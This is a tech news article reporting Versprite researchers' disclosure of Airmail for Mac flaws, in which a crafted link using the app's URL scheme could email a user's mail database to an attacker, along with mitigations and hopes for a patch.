Security researchers at Versprite have identified security flaws in Airmail for Mac that can expose private data, including an entire account’s email database. The attack requires a user to open a maliciously crafted email and tap a link inside the message. With a combination of technical exploit and phishing attack, it seems like a significant problem.
You can read the full breakdown of the vulnerabilities on the Versprite blog. Essentially, the researchers noticed that Airmail registers a custom URL scheme that can autonomously send an outbound email with particular content and attachment data.
They also discovered that the mail database where Airmail stores the email messages for an account are located in a ‘deterministic’ location in the file system. An unscrupulous attacker can combine these two pieces of information together.
You can create a link that uses the Airmail URL scheme such that when it is tapped by the recipient, it sends a new email to the ‘hacker’ that attaches all of the mail messages from the user.
It is a pretty big security problem as it stands, although there are some mitigations to consider. For a start, an attacker has to know that someone is using Airmail, and has to get the recipient to click on a link in the email they have sent in order for it to work. This particular attack also will not work if the name of the account is renamed from the default. The attackers identified a related vulnerability that would remove the required user interaction step altogether, but they could not execute it reliably.
If this was exploited in the real world, the malicious link would likely be disguised by some sort of phishing email. Some scary warning like ‘Click here to see an important message from your bank’ would be enough to encourage many people to click through.
Thankfully, there are some obvious ways in which Airmail can defend against these types of exploits so hopefully there will be an update released promptly that addresses the attack vectors.
FTC: We use income earning auto affiliate links. More.
Comments